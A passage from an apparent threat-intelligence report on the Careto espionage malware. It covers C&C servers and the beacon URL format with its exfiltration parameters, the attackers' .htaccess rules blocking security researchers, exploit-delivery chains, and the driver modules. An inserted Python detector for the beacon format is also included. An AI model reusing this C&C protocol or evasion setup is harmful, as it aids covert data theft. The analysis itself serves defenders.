Here\xe2\x80\x99s a full list of the C&C servers for the OS X backdoor: Host name IP Server location itunes212.appleupdt.com 200.46.107.115 Panama, Net2net Corp. itunes214.appleupdt.com 200.46.107.116 Panama, Net2net Corp. itunes311.appleupdt.com 200.46.107.117 Panama, Net2net Corp. As of Feb 6th, 2014, the OS X \xe2\x80\x9cSBD\xe2\x80\x9d backdoor C&C domains have been suspended by Apple. 25 TLP: GREEN 2.3. Digital certificates Most Careto samples we obtained are signed by two different digital certificates belonging to the same company TecSystem Ltd, from Bulgaria. We don\xc2\xb4t know if this company is legitimate. Certificate 1: e l 36 be 4a d4 57 f0 62 fa 77 d8 75 95 b8 cc c8 cf m 71 a4 ee 9d 5d 6a 26 85 1e 35 25 60 93 69 22 ee b6 d5 9a 1f Certificate 2: e l 0e 80 8f 23 15 15 bc 51 9e ea 1a 73 cd f3 26 6f m 34 10 f8 cf 77 e1 7a 51 36 45 16 18 0c 3e 6d 46 b6 6c 93 c4 The first certificate was valid between 28.Jun.2011 - 28.Jun.2013. The second certificate was valid from 18.Apr.2013 - 18.Jul.2016. Figure 9: Digital certificate used The second valid certificate has been blacklisted by Verisign. 26 TLP: GREEN 2.4. Exploit for Kaspersy\xc2\xb4s products We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \xe2\x80\x9cinvisible\xe2\x80\x9d in the system. This vulnerability was solved in 2008, when all this module was remade from scratch and the communication protocol changed, including additional security checks. The attackers could have used this exploit for avoiding detection in some Workstation products prior version 6.0.4.*, and KAV/KIS 8.0 versions not updated properly (it was fixed during this release). Of course, this raised our interest and our research team decided to investigate further. In other words, the attackers attracted our attention by attempting to exploit Kaspersky Lab products. We have no knowledge of any other malware exploiting this vulnerability. 27 TLP: GREEN 2.5. 
Communication

The communication between the C&Cs and the victims uses an encrypted protocol over HTTP or HTTPS. In the case of the Careto implant, the C&C communication channel is protected with two layers of encryption. The data received from the C&C server is encrypted using a temporary AES key, which is passed along with the data and is itself encrypted with an RSA key. The same RSA key is used to encrypt the data that is sent back to the C&C server. This double encryption is uncommon and shows the high level of protection implemented by the authors of the campaign.

So far, we have observed two versions of command and control modules, named "index.cgi", "main.cgi" and "commcgi.cgi". These are used by the generations of the malicious modules to communicate with the attackers. The Careto implant uses "main.cgi", "index.cgi" and "commcgi.cgi". SGH uses exclusively "index.cgi".

During C&C connections, the "Install" or "Inst" parameters contain the unique ID assigned to the victim. Here's what a typical C&C query looks like:

http(s)://SERVER/cgi-bin/commcgi.cgi?Group=XXX==&Install=VICTIMID&Ver=BACKDOORVERSION&Ask=BOOLEAN&Bn=NUMBER

Known parameters for "commcgi.cgi" and "index.cgi":

Parameter | Explanation
Group | Base-64 encoded hash of the first 16 bytes of the victim identifier
Install | Unique victim identifier
Ver | Implant version; C for Careto, S for SGH.
Ask | Request mode: "1" - requesting commands, "0" - reporting results
CmdId | Command id
Ack | Acknowledgement of successful command execution on the victim's machine
Bn | Hardcoded value, i.e.
"3"
File | Filename for exfiltrated data
Offset | Offset to write exfiltrated data

Based on the "Ver" parameter, we extracted the list of unique implant versions connecting to our sinkhole over the past weeks. Although most of the connections come from the Careto implant, some indicate the possible presence of unknown versions.

Figure 10: Sinkholed requests by version

C314, the most popular ID, is used by the Careto module. C316 is the second most popular Careto module version. The "L" version of the implant is a mystery. We associate it with a version of Careto which we haven't been able to locate so far, perhaps the Linux variant. Its C&C communication is also different from the other modules: the "L" version communicates exclusively with the "index.cgi" script. Finally, the "AND1.0.0.0" version identifier is the most interesting. The only known victim in the world running this version of the implant appears to be connecting through a 3G link, possibly indicating a mobile device. Also, there is no user agent string, unlike in other versions of Careto. The most likely explanation for the version name would be "AND(DROID)", indicating a version of the implant for Google's Android OS. The "AND" implant communicates exclusively with "commcgi.cgi".

2.6. C&C Servers

The backdoor modules communicate with command and control via HTTP or HTTPS, depending on the malware configuration. In all the cases we observed, the C&C exposes a CGI based frontend via modules named "index.cgi" and "commcgi.cgi". A list of collected C&C URLs from known modules is included below, together with server location.
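As an added example (not part of the report), a detector for the C&C query shape documented in the parameter table above, run over constructed web-proxy log lines; the hostnames, client addresses and log format are placeholders chosen for the example.

```python
"""Flag web-proxy log lines whose URL has the shape of the Careto/SGH C&C
query described in the report: a /cgi-bin/{commcgi,index,main}.cgi script
with the Install (or Inst), Ver and Ask parameters. Added example; the log
lines are constructed and the hostnames are placeholders, not real servers."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

CGI_SCRIPT_RE = re.compile(r"/cgi-bin/(commcgi|index|main)\.cgi$")
FAMILY_BY_PREFIX = {"C": "Careto", "S": "SGH"}   # from the Ver parameter table
ASK_MODE = {"1": "requesting commands", "0": "reporting results"}


def classify_url(url: str) -> Optional[Dict[str, str]]:
    """Return a description of the beacon if url matches the C&C query shape,
    else None. Only the parameters the report documents are inspected."""
    parts = urlsplit(url)
    m = CGI_SCRIPT_RE.search(parts.path)
    if not m:
        return None
    # parse_qs splits each pair on the first '=', so Group=XXX== keeps its padding.
    q = parse_qs(parts.query, keep_blank_values=True)
    victim = (q.get("Install") or q.get("Inst") or [""])[0]
    ver = q.get("Ver", [""])[0]
    if not victim or not ver:
        return None          # a generic /cgi-bin/index.cgi hit, not a beacon
    family = next((name for prefix, name in FAMILY_BY_PREFIX.items()
                   if ver.startswith(prefix)), f"unknown (Ver={ver})")
    return {
        "script": m.group(0).rsplit("/", 1)[-1],
        "host": parts.hostname or "",
        "victim": victim,
        "version": ver,
        "family": family,
        "mode": ASK_MODE.get(q.get("Ask", [""])[0], "unspecified"),
        "cmd_id": q.get("CmdId", [""])[0],
    }


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Constructed log format: '<timestamp> <client-ip> <method> <url>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        beacon = classify_url(fields[3])
        if beacon:
            beacon["client"] = fields[1]
            beacon["time"] = fields[0]
            hits.append(beacon)
    return hits


# Constructed sample: two beacons (one Careto, one of the undocumented "L"
# version) among ordinary traffic. Hostnames are placeholders.
SAMPLE_LOG = """\
2014-02-06T10:12:01Z 10.1.2.3 GET https://cnc-a.example.invalid/cgi-bin/commcgi.cgi?Group=QUJDRA==&Install=1234567890123456&Ver=C314&Ask=1&Bn=3
2014-02-06T10:12:05Z 10.1.2.4 GET https://www.example.com/cgi-bin/index.cgi?page=1
2014-02-06T10:13:11Z 10.1.2.5 GET http://cnc-b.example.invalid/cgi-bin/index.cgi?Group=QUJDRA==&Inst=6543210987654321&Ver=L&Ask=0&CmdId=7&Ack=1
2014-02-06T10:14:00Z 10.1.2.6 GET https://search.example.com/search?q=commcgi.cgi
"""

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG.splitlines()):
        print(f"{hit['time']} {hit['client']} -> {hit['host']}/{hit['script']} "
              f"victim={hit['victim']} {hit['family']} ({hit['mode']})")
```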
C&C URL | Server IP | Location
hxxp://202.75.56.231/cgi-bin/index.cgi | | Malaysia, Kuala Lumpur, "Tm Vads Dc Hosting"
hxxp://202.75.58.153/cgi-bin/commcgi.cgi | | Malaysia, Kuala Lumpur, "Tm Vads Dc Hosting"
hxxp://cherry1962.dyndns.org/cgi-bin/index.cgi | 202.75.56.231 | Malaysia, Kuala Lumpur, "Tm Vads Dc Hosting"
hxxps://196.40.84.94/num | | Costa Rica, San Jose, "Servicio Co-location Racsa"
hxxps://202.150.214.50/cgi-bin/commcgi.cgi | | Singapore, "Benwu"
hxxps://carrus.gotdns.com/cgi-bin/commcgi.cgi | 202.75.56.123 | Malaysia, Kuala Lumpur, "Tm Vads Dc Hosting"
hxxps://dfup.selfip.org/cgi-bin/commcgi.cgi | 37.235.63.127 | Austria, Graz, "Edis Gmbh"
hxxps://redirserver.net/num | 196.40.84.94, 190.10.9.209 | Costa Rica, San Jose, "Servicio Co-location Racsa"
hxxps://wwnav.selfip.net/cgi-bin/commcgi.cgi | 190.105.232.46 | Argentina, Buenos Aires, "Nicolas Chiarini"
hxxps://81.0.233.15/cgi-bin/index.cgi | | Czech Republic, Prague, Casablanca Int
hxxps://helpcenter1it6238.cz.cc/cgi-bin/commcgi.cgi | 82.208.40.11 | Czech Republic, Prague, Casablanca Int
hxxps://helpcenter2br6932.cc/cgi-bin/commcgi.cgi | n/a | n/a
hxxps://223.25.232.161/cgi-bin/commcgi.cgi | | Singapore, "Sg 8 To Sg"
hxxps://oco-231-ms.xns01.com/cgi-bin/commcgi.cgi | 223.25.232.161 | Singapore, "Sg 8 To Sg"
hxxps://75.126.146.114/cgi-bin/index.cgi | | United States, Dallas, "Softlayer Technologies Inc."
hxxps://services.serveftp.org/cgi-bin/main.cgi | 75.126.146.114 | United States, Dallas, "Softlayer Technologies Inc."
hxxps://ricush.ath.cx/cgi-bin/commcgi.cgi | 75.126.146.114 | United States, Dallas, "Softlayer Technologies Inc."
hxxps://nthost.shacknet.nu/cgi-bin/index.cgi | 190.105.232.46 | Argentina, Buenos Aires, "Nicolas Chiarini"

We were able to obtain a copy of a C&C through one of our partners in Latin America, which allowed us to analyse how it works.

C&C server structure

A typical C&C server has the following structure:

/var/www
  index.html < blank page
  /html < link to "Clean Decoy"
  /cgi-bin
  /secure

The /cgi-bin and /secure folders are described below.

• CGI-BIN Folder:

/cgi-bin
  commcgi.cgi < C&C module
  file.cgi < tool used by the attackers to retrieve logs
  index.cgi < C&C module
  kitkat.cgi < same file as index.cgi
  main.cgi < same file as index.cgi
  /ClientsDirectory < used to store victims' information
    log.txt < debug logfile with victims' requests
  /dataang < empty
  /CmdData < empty
  /data < empty
  /fb < empty
  /bkp < could be for "backup"; several small old logfiles
  /in < probably inbox folder for stolen files
  /img < encrypted files with .gif extension

In the case of the "/in" folder, we find many small encrypted files of the same size (512 bytes) with the following naming schema:

in.instVICTIMID.cmd000X.get000Y

Apparently these files are the result of executing command X on VICTIMID. Small packets of the same size mean that the communication is fragmented; Y probably represents the packet sequence number. VICTIMID is always a 16 digit number.

In the case of the /img folder, all files are encrypted data files of 929 bytes. The format is:

VICTIMID.000N.gif or VICTIMID.000N.000X

These are chunks of stolen data for a given VICTIMID, X being the sequence number and N the file identifier. Files in the second format don't all have the same size, reinforcing the hypothesis that they are the last chunk of a file's data.

• Secure Folder:

/Secure
  getlogs.php < Parses log files from Apache and copies their content into /usr/local/share/messages/log.
    Securely deletes the original log files using the "shred -z" command.
  module.php < Allows uploading, deleting and moving modules into var/www/html
  test.php < A "Hello world" application
  upload.php < Uploads files into /usr/local/share/messages/authdata/auth

Additionally, a Perl script (launchMessages.pl) inside "/usr/local/share/messages" is used by the users to communicate between themselves. The script copies messages from one user to the receiver using the data in the /home/user/auth subdirectory, in the format $adfile, $login $passwd $auth $secure $port\n.

Finally, we observed interesting data inside ".htaccess" files. Clearly the attackers wanted to keep their infrastructure hidden from undesired visitors. For this, they blacklisted a number of IPs used by security researchers. Some of these IPs include comments about the owners from whom the Careto attackers want to hide. Notably, Kaspersky Lab IPs are included in the list.

/var/www/cgi-bin/.htaccess:

deny from 72.52.91.30 < Hurricane Electric, Inc.
deny from 217.115.10.132 < Chaos Computer Club e.V.
deny from 213.61.149.100 < SOPRADO GmbH
deny from 62.213.110.0/26 < Kaspersky Lab
deny from 23.20.44.92 < Amazon.com
deny from 38.105.71.0/24 < Cyveillance Inc
deny from 66.150.14.0/24 < Internap Network Services
deny from 150.70.0.0/16 < TrendMicro
deny from 194.72.238.0/24 < Netcraft Ltd
# evuln.com
deny from 78.158.11.0/24 < evuln.com
# cambridge computer laboratory
deny from 128.232.0.0/16 < cambridge computer laboratory
# softlayer
deny from 174.36.0.0/15 < softlayer
deny from 174.122.254.42 < softlayer
# segurança virtua
deny from 187.122.176.14 < segurança virtua
# worldstream
deny from 217.23.0.0/24 < worldstream
# bluecoat
deny from 8.28.16.254 < bluecoat
deny from 103.246.38.0/24 < bluecoat
deny from 199.19.248.0/21 < bluecoat
deny from 199.91.132.0/22 < bluecoat
# eset
deny from 195.168.53.0/24 < eset

A second .htaccess file was found in the home folder of the only user in the system:

#order deny,allow
Order allow,deny
deny from 23.20.44.92 < Amazon EC2
deny from 38.105.71.0/24 < Cyveillance Inc
deny from 66.150.14.0/24 < Internap Network Services
deny from 150.70.0.0/16 < TRENDMICRO
deny from 194.72.238.0/24 < Netcraft Ltd
deny from 78.158.11.0/24 < evuln.com
deny from 128.232.0.0/16 < cambridge computer laboratory
deny from 174.36.0.0/15 < softlayer
deny from 174.122.254.42 < softlayer
deny from 187.122.176.14 < segurança virtua
deny from 217.23.0.0/24 < worldstream
deny from 8.28.16.254 < bluecoat
deny from 103.246.38.0/24 < bluecoat
deny from 199.19.248.0/21 < bluecoat
deny from 199.91.132.0/22 < bluecoat
deny from 195.168.53.0/24 < eset
allow from all

# Workaround for Apache Killer
# http://seclists.org/fulldisclosure/2011/Aug/241
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(HEAD|GET) [NC]
RewriteCond %{HTTP:Range} ([0-9]*-[0-9]*)(\s*,\s*[0-9]*-[0-9]*)+ [OR]
RewriteCond %{HTTP:Request-Range} ([0-9]*-[0-9]*)(\s*,\s*[0-9]*-[0-9]*)+
RewriteRule .* - [F]

These files demonstrate that the attackers are carefully protecting their infrastructure and try to avoid any monitoring attempts from security companies, including Kaspersky Lab and ESET.

Command and control domain registrations can be found in APPENDIX 3.

2.7. Exploits

The spear phishing attacks we observed lured the victims to URLs with resources in Spanish, such as videos related to political subjects or even food recipes ("recetas"). All the e-mails include a link to the malicious server that was used to infect the victim. After the infection, the visitor was redirected to another, clean URL. The following links have been observed in the attacks:

• hxxp://bit.linkconf[dot]net/jupd/w/frame-index.htm?url=hxxp://bit.ly/{censored}
• hxxp://bit.linkconf[dot]net/jm/frame-redirect.htm?url=hxxp://bit.ly/{censored}
• hxxp://www.recetas.linkconf[dot]net/jupd/w/frame-index.htm?url=hxxp://www.recetas.net/receta.asp?ID=1208GL

The exploit pack was hosted on a server at "linkconf[dot]net". We found many subdomains pretending to be newspapers, perfect for spear phishing attacks.
Most of them simulate Spanish newspapers:

● negocios.iprofesional.linkconf[dot]net/
● www.internacional.elpais.linkconf[dot]net/
● politica.elpais.linkconf[dot]net/
● cultura.elpais.linkconf[dot]net/
● economia.elpais.linkconf[dot]net/
● test.linkconf[dot]net/
● soc.linkconf[dot]net/
● sociedad.elpais.linkconf[dot]net/
● world.time.linkconf[dot]net/
● internacional.elpais.linkconf[dot]net/
● elpais.linkconf[dot]net/
● www.elespectador.linkconf[dot]net/
● blogs.independent.linkconf[dot]net/
● www.elmundo.linkconf[dot]net/
● www.guardian.linkconf[dot]net/
● www.washingtonsblog.linkconf[dot]net/
● www.publico.linkconf[dot]net/

The server has the typical structure of an exploit server, including JavaScript code for profiling the victim (browser, plugins, operating system, MS-Office version, etc.). The attack is designed to handle all possible cases and potential victim types. Depending on the operating system, browser and installed plugins, the user is redirected to different subdirectories, which contain the specific exploits for the user's configuration that are most likely to work.

Unfortunately, we couldn't obtain any of the observed live exploits from the server, as the attack URLs were removed, presumably after a successful hit on the victims. We did, however, find older exploits in various folders. Overall, we found exploits for Java and SWF (CVE-2012-0773), as well as malicious plugins for Chrome and Firefox, on Windows, Linux and OS X. The names of the subdirectories give some information about the kind of attack they launch; for instance, in "/jupd" a "JavaUpdate.jar" downloads and executes "javaupdt.exe".
Several attacks against browsers supporting Java have been observed. Unfortunately, we weren't able to retrieve all the components of these attacks, as they were no longer available on the server at the time of checking. The first known method ("/jr/" folder) uses an HTML file ("frame-index.htm") that attempts to load and run a signed applet.

Figure 11: JavaUpdate.jar

File name: JavaUpdate.jar
MD5: da1ad4e088ba921c0420428b1f73d5ca
File size: 273639 bytes

JavaUpdate.jar contains an exploit for CVE-2011-3544, a vulnerability in the Java Runtime Environment (JRE) component of Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier. Both the Java archive and the malicious Windows payload appear to have been compiled on Nov 7, 2013.

Archive: JavaUpdate.jar
Name | Length | Method | Size | Ratio | Date | Time | CRC-32
META-INF/MANIFEST.MF | 620 | Defl:N | 400 | 36% | 11-08-13 | 08:57 | 8ded95ba
META-INF/ORACLE.SF | 782 | Defl:N | 494 | 37% | 11-08-13 | 08:57 | a50eb589
META-INF/ORACLE.DSA | 922 | Defl:N | 774 | 16% | 11-08-13 | 08:57 | 1adab24b
META-INF/ | 0 | Defl:N | 2 | 0% | 11-08-13 | 08:57 | 00000000
applet.properties | 37 | Defl:N | 36 | 3% | 11-08-13 | 08:57 | bfd6b431
icon.jpg | 278329 | Defl:N | ? | 8% | 11-08-13 | 08:57 | fd085c57
javaupdt | 19784 | Defl:N | ? | 49% | 11-08-13 | 08:57 | 58d365de
com/ | 0 | Stored | 0 | 0% | 11-08-13 | 08:57 | 00000000
com/java/ | 0 | Stored | 0 | 0% | 11-08-13 | 08:57 | 00000000
com/java/UpdateAbstract.class | 1914 | Defl:N | 1079 | 44% | 11-08-13 | 08:57 | 3e6f4e02
com/java/WindowsUpdate.class | 2825 | Defl:N | 1555 | 45% | 11-08-13 | 08:57 | 372c40f3
com/java/Update.class | 1221 | Defl:N | 735 | 40% | 11-08-13 | 08:57 | 0c3ad05f

The exploit's Windows payload:

File name: javaupdt
Type: Windows PE executable
MD5: 302fd970cf413afe50e6a829386e6e43
File size: 19784 bytes

The "javaupdt" executable decrypts and runs the main backdoor installer from a file named "icon.jpg" in the Java archive. The installer is encrypted with a 12-byte XOR key.
Interestingly, the exploit payload is compiled with GCC, unlike other modules where the attackers used MSVC 2005.

The second attack against Java users leverages Java Web Start / JNLP (Java Network Launch Protocol) files. It claims to be a Java update from Oracle and asks the user to install it. The spearphished URLs reference "http://linkconf[dot]net/jn/w/file.jnlp".

Figure 12: Java Update

The "index.jnlp" has the following content:

Figure 13: Index jnlp

Its main function is to load "JavaUpdate.jar", which contains a signed dropper that installs the SGH implant into the system.

A Java version profiler which loads another JAR file named "sSunJavaRealTimeSystem.jar" was also found on the server, in a folder named "m"; considering the attackers' folder naming scheme, this might suggest it was used for OS X visitors.

Name | Length | Method | Size | Ratio | Date | Time | CRC-32
com/ | 0 | Stored | 0 | 0% | 10-07-13 | 16:20 | 00000000
com/java/ | 0 | Stored | 0 | 0% | 10-07-13 | 16:20 | 00000000
com/java/Update.class | 400 | Defl:N | 281 | 0% | 10-07-13 | 16:20 | 3f8cb4bf

This class simply prints a message which says "Updated!".

The other observed attack method relies on a Flash Player exploit. CVE-2012-0773 has an interesting history. It was originally discovered by the French company VUPEN and used to win the "pwn2own" contest in 2012. This was the first known exploit to escape the Chrome sandbox. VUPEN refused to share the exploit with the contest organizers, claiming that it planned to sell it to its customers. As a side note, VUPEN exploits are commonly seen in high end nation state level attacks; for instance, we have commonly observed them with HackingTeam's DaVinci / Remote Control System attacks.
Figure 14: CVE-2012-0773 staging script

Figure 15: Heapspray class inside the ActionScript

The SWF exploit for CVE-2012-0773 appears to have been fine-tuned for Flash Player versions 10.3.x. Although these have become obsolete (the current version is 12.0.0.38), there is no point in implementing / showcasing such a complex exploit unless the attackers were leveraging it around the time it was discovered. It is also possible that the exploit was still on the server because some users still have old Flash Player versions, and for those it's a perfectly good attack method.

We believe the "/m" subdirs are for Mac users, and the "/l" subdirs for Linux. In these we found traces of Firefox plugins, but unfortunately they were broken.

Linux plugin:

Archive: af_l_addon.xpi
Name | Length | Method | Size | Ratio | Date | Time | CRC-32
chrome.manifest | 183 | Defl:N | 101 | 45% | 10-07-13 | 14:30 | cc37d585
install.rdf | 1274 | Defl:N | 443 | 65% | 10-07-13 | 14:30 | add50a10
bootstrap.js | 1798 | Defl:N | 695 | 61% | 10-07-13 | 14:30 | 52eecaba
content/browser.xul | 166 | Defl:N | 134 | 19% | 10-07-13 | 14:30 | 74e9bad7
content/icon.png | 66793 | Defl:N | 66664 | 0% | 10-07-13 | 14:30 | 27609d6e
plugins/sbd-linux | 26020 | Defl:N | 22406 | 14% | 10-07-13 | 14:30 | a02b2e21

Mac / OS X plugin:

Archive: af_m_addon.xpi
Name | Length | Method | Size | Ratio | Date | Time | CRC-32
chrome.manifest | 183 | Defl:N | 102 | 44% | 10-07-13 | 14:30 | aeac29ae
install.rdf | 1274 | Defl:N | 443 | 65% | 10-07-13 | 14:30 | f5ee7026
bootstrap.js | 1796 | Defl:N | 695 | 61% | 10-07-13 | 14:30 | d5fc6c9b
content/browser.xul | 166 | Defl:N | 134 | 19% | 10-07-13 | 14:30 | 74e9bad7
content/icon.png | 66793 | Defl:N | 66664 | 0% | 10-07-13 | 14:30 | 27609d6e
plugins/sbd-mac | 42720 | Defl:N | 37072 | 13% | 10-07-13 | 14:30 | 12d19684

Both attack plugins appear to have been compiled on October 7, 2013.
Samples of a malicious Chrome (Win32) plugin have also been located in the "/ag" folder:

File name: plugin.crx
MD5: 1f40751f3db07f88c2ffe95b6a5fde86
File size: 256596 bytes

The malicious Chrome plugin has the following structure:

Name | Length | Method | Size | Ratio | Date | Time | CRC-32
content/ | 0 | Defl:N | 2 | 0% | 00-00-80 | 00:00 | 00000000
manifest.json | 305 | Defl:N | 165 | 46% | 00-00-80 | 00:00 | b500a493
plugins/ | 0 | Defl:N | 2 | 0% | 00-00-80 | 00:00 | d5fc6c9b
plugins/npplugin.dll | 16384 | Defl:N | 7358 | 55% | 00-00-80 | 00:00 | 3bd3e8bb
content/icon.jpg | 266948 | Defl:N | 245924 | 8% | 00-00-80 | 00:00 | b07ab7ee
content/icon.png | 2184 | Defl:N | 2189 | 0% | 00-00-80 | 00:00 | 276fc4e2

The plugin is loaded via JavaScript from the HTML index through a file named "plugin.js":

Figure 16: Loading plugin

The "plugin.js" has the following content:

Figure 17: Plugin.js

When an unsuspecting user visits the page with Google Chrome, they get a warning indicating that "Extensions, Apps and Themes" can harm their computer:

Figure 18: Chrome warning

The user has to choose "Continue" in order to activate the malicious plugin. The plugin installation from the exploit site works for Chrome versions prior to 21, which was released in mid-2012. The "npplugin.dll" acts as a loader for the main malware installer, which is encoded / obfuscated in "content/icon.jpg". Its compilation timestamp is Thu Nov 07 11:00:03 2013.

File name: npplugin.dll
MD5: 3299415710a29ffb55e53044fc191450
File size: 16384 bytes

All the exploits on the server work with multi-component artifacts, some of them disguised as ".jpg" files. Also, the communication with the JavaScript functions is done through cookies ("end_cookie_18a27"), a quite unusual method.

2.8. Victims

During the investigation we were able to sinkhole some of the C&C servers.
All sinkholed domains have been redirected to the Kaspersky Sinkhole server. This provided detailed information regarding the location of the victims. Additionally, some of the command and control servers maintain a debug log which includes information about the victims, such as IPs and timestamps. This debug log file is stored in a folder named "ClientsDirectory" and is named "log.txt". By collecting "log.txt" files from various Careto C&C servers, it was possible to make a more detailed map of the victims' IPs.

Figure 19: Victims' IPs by country

In total, we observed over 1,000 victim IPs in 31 countries. We have also found traces of at least 380 different victim IDs, according to the attackers' naming schema, both in logs and in sinkholed requests. The following charts correspond only to sinkholed data and ignore the historical data retrieved from log files. This data is fresher, showing the current interest of the attackers.

The first chart shows the geographical distribution of the victim IDs:

Figure 20: Geographical distribution by unique ID – sinkholed data

In this case there is a clear outlier. The reason is that there is a big cluster of victims in Cuba corresponding to very few IP addresses, all belonging to the same institution. The following chart provides the geographical location of victims' IPs instead of IDs, using only sinkholed data:

Figure 21: Geographical distribution by victims' IPs – sinkholed data

In this chart we see the opposite effect from the previous one, in this case with Venezuela, where few victims use multiple IPs.

Spain, France and Morocco are the only countries appearing in the top 5 in all cases.
The main targets of Careto fall into the following categories:

● Government institutions
● Diplomatic offices / embassies
● Energy, oil and gas companies
● Research
● Private equity firms
● Activists

3. Attribution

Different malware components include language artifacts from the authors, suggesting they are proficient in the Spanish language. Some of the slang words used would be very uncommon for a non-native Spanish speaker. For instance, the "appleupdt[dot]com" C&C domain has been registered by one "Victoria Gomez" from Argentina. The registration data appears fake, though.

Spanish language artifacts include:

• "Careto - GetSystemReport v1.0" - in the "waiter32/64" module
• "Unistalling Careto" - in the CDlUninstallSGH32 module. "Careto" is a Spanish slang word for "face".
• "Caguen1aMar" - an RC4 encryption key stored in the configuration data, used for all communications with the command and control servers. This would be a contraction of "Me cago en la mar", a Spanish expression meaning "fuck".
• "Accept-Language: es Accept-Encoding: gzip" - in the configuration data

The authors made a number of mistakes as well. For instance, they forgot debug information in an SGHTesterCmd module, which contains a path on the developer's machine:

• c:\Dev\CaretoPruebas3.0\release32\CDllUninstall32.pdb

"Pruebas" means "tests" in Spanish. There are also some small mistakes in some English comments:

//Attempt to move the uploaded file to it's new place
Unistalling Careto
Uinstalling SGH

On the exploit server we found most of the subdomains simulating newspapers from Spain.
It should be noted that Spanish is spoken in 21 countries, where it is either a national language or a de facto official language. We should also not exclude the possibility of a false flag operation, where the attackers intentionally planted Spanish words in order to confuse analysis.

4. Conclusions

With Careto, we describe yet another sophisticated cyberespionage operation that has been going on undiscovered for more than 5 years. In terms of sophistication, we put Careto above Duqu, Gauss, RedOctober or Icefog, making it one of the most complex APTs we have observed.

For Careto, we observed a very high degree of professionalism in the operational procedures of the group behind this attack, including monitoring of their infrastructure, shutdown of the operation, avoiding curious eyes through access rules, using wiping instead of deletion for log files, and so on. This is not very common in APT operations, putting the Mask into the "elite" APT groups section.

The attacks rely on a combination of social engineering, for instance impersonating websites from The Guardian and Washington Post. These are coupled with at least one exploit that, according to media reports, has been sold to governments as a 0-day by the French company VUPEN.

The targeting of Linux and Mac users by the attackers indicates another important trend in the world of APTs. We previously observed this and described it with Icefog; we can now say with a good degree of confidence that high end APT actors are expanding their toolkits to include Linux and Mac "support". Also, there is evidence the attackers may have deployed Android and iOS backdoors as well. Unfortunately, we could not locate these samples yet, nor do we know how they were implanted, especially considering iOS's security model.

The fact that the Careto attackers appear to speak Spanish is perhaps the most unusual feature.
While most of the known attacks nowadays are filled with Chinese comments, languages such as German, French or Spanish appear very rarely in APT attacks.

Special thanks

We would like to thank OpenDNS for providing passive DNS information on the C&C domains used by the attackers and for their support with sinkholing.

APPENDIX 1: Indicators of compromise

Filenames:

Registry keys:
[HKLM\Software\Classes\CLSID\{E6BB64BE-0618-4353-9193-0AFE606D6F0C}\InprocServer32]

C&C and exploit staging server IPs:

Domains and hostnames:
APPENDIX 2: SGH Modules – detailed analysis

i) The "Scsimap" driver

This driver is started automatically by the system as a service. It is responsible for loading the rest of the malware's components and providing communication facilities between them. It acts as a framework that glues together all the parts of the malware.

File type: Win32 driver
Compilation timestamp: 2013.04.09 14:15:03 (GMT)
File size: 14464 bytes

Technical details

The file was compiled using Microsoft Visual Studio 2003. The driver exports three functions that provide the API for the malware's kernel-mode components:

0001086C: IopQueryInterface
00010840: IopRegisterInterface
00010888: IopSetDeviceStatusChange

It creates a device:
\Device\{E07DB02C-387E-43b2-A6F2-C59B4934B7D6}

It also creates a symbolic link to this device:
\DosDevices\{E07DB02C-387E-43b2-A6F2-C59B4934B7D6}

The "Scsimap" driver loads other modules from "\SystemRoot\System32\bootfont.bin", which is an encrypted virtual file system. It decrypts it on the fly using RC4, then loads and executes all the additional modules present in that file.

The module receives commands via the DeviceIoControl function. It can be commanded to load a binary from the "bootfont.bin" file, to write a new "bootfont.bin" configuration, to return the contents of that file, and to overwrite its contents.
A typical "bootfont.bin" virtual file system contains the following driver modules:

Module config, 8272 bytes
Module storage, 12240 bytes
Module cipher, 7248 bytes
Module cmprss, 2640 bytes
Module loaddll, 14032 bytes
Module PGPsdkDriver, 7504 bytes
Module fileflt, 32080 bytes
Module stopsec, 2768 bytes
Module TdiFlt, 17616 bytes
Module TdiFlt2, 18512 bytes

The modules interact with each other by exporting and importing function pointers. Each function is identified by a numeric value. The module that provides a function first registers it by calling the "IopRegisterInterface" function exported by "scsimap"; a consumer can then request the function pointer by calling IopQueryInterface with the proper function number.

ii) Config module

This module operates the SGH's unified configuration data that is used by all other components. It exports the following functions:

0x00 ReadConfig
0x01 WriteConfig

The data is stored in the registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\scsimap\Params, Value

The configuration block is encrypted with a hardcoded key using the RC4 algorithm.

iii) Storage module

This module maintains two storage files:
\SystemRoot\System32\c_50229.nls
\SystemRoot\System32\c_50227.nls

The module receives information collected by other modules and stores it in a system activity log. Entries in the activity log are prepended with timestamps and text labels (see below). These labels correspond to internal and system events, e.g. writing collected information to a file, starting a new process, etc.
Exported functions:
0x08 Store a log entry with the label "GET"
0x09 Store a log entry with the label "DEL"
0x0A Store a log entry with the label "PUT" (new data collected)
0x0B Create an additional activity log file \SystemRoot\System32\~{7 hex digits}.tmp
0x0C Not implemented
0x0D Not implemented
0x0E Not implemented
0x0F Not implemented
0x15 Get internal storage state
0x16 Get internal storage state
0x18 Get internal storage state
0x19 Store a log entry with the label "PURGE"
0x1F Store a log entry with the label "START" (system startup)
0x20 Store a log entry with the label "STOP" (system shutdown)

v) Cipher module

Provides cryptographic functions for other modules.

Exported functions:
0x10 Encrypt data with AES-128
0x11 Encrypt data with AES-128
0x12 Encrypt data with RC4
0x13 Encrypt data with RC4

vi) Cmprss module

Provides compression functions for other modules.

Exported functions:
0x1A Compress data with LZNT1 using the system RtlCompressBuffer function.
0x1B Decompress data with LZNT1 using the system RtlDecompressBuffer function.

vii) LoadDll module

Registers handler functions for process-creation and image-load events. The module reads the list of DLL loading rules from the configuration block and checks them when a new process is created or a module is loaded. These rules specify the location of the DLL to be injected and the list of target process names to inject it into. An example list of rules follows.
DLL: System32\vchw9x.dll
targets: IEXPLORE.EXE:FIREFOX.EXE:MOZILLA.EXE:OPERA.EXE:NETSCAPE.EXE:EMULE.EXE:CHROME.EXE
DLL: none
targets: @1:*SVCHOST.EXE
DLL: System32\awcodc32.dll
targets: EXPLORER.EXE
DLL: System32\SkypeIE6Plugin.dll
targets: SKYPE.EXE
